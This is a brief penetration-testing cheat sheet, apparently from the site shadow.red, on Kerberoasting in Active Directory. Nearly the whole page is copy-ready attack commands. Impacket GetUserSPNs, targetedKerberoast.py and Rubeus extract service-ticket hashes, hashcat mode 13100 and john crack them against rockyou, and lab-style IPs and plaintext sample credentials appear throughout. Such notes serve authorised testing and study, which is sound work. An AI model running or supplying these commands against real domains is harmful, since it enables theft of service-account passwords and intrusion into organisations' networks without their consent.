>_ shadow.red

Kerberoasting

Active Directory AD Attacks linux windows

Remote (impacket) - need valid creds

impacket-GetUserSPNs -dc-ip 10.10.66.150 'vulnnet-rst.local/t-skid:tj072889*' -request
sudo impacket-GetUserSPNs -request -dc-ip 192.168.50.70 corp.com/pete

Targeted variant (against discovered SPNs)

targetedKerberoast.py -v -d 'hokkaido-aerospace.com' -u 'hrapp-service' -p 'Untimed$Runny' --dc-ip 192.168.208.40

Reference: https://github.com/ShutdownRepo/targetedKerberoast

From a Windows host - Rubeus

.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

If a hash contains ; and won’t crack, try removing it first.

Crack with hashcat (mode 13100)

sudo hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force

Crack with john

john MSSQLSvc.txt --wordlist=/usr/share/wordlists/rockyou.txt

Time sync gotcha

If the request fails, sync clock with the DC:

sudo rdate -n 10.10.10.100
sudo ntpdate vulnnet-rst.local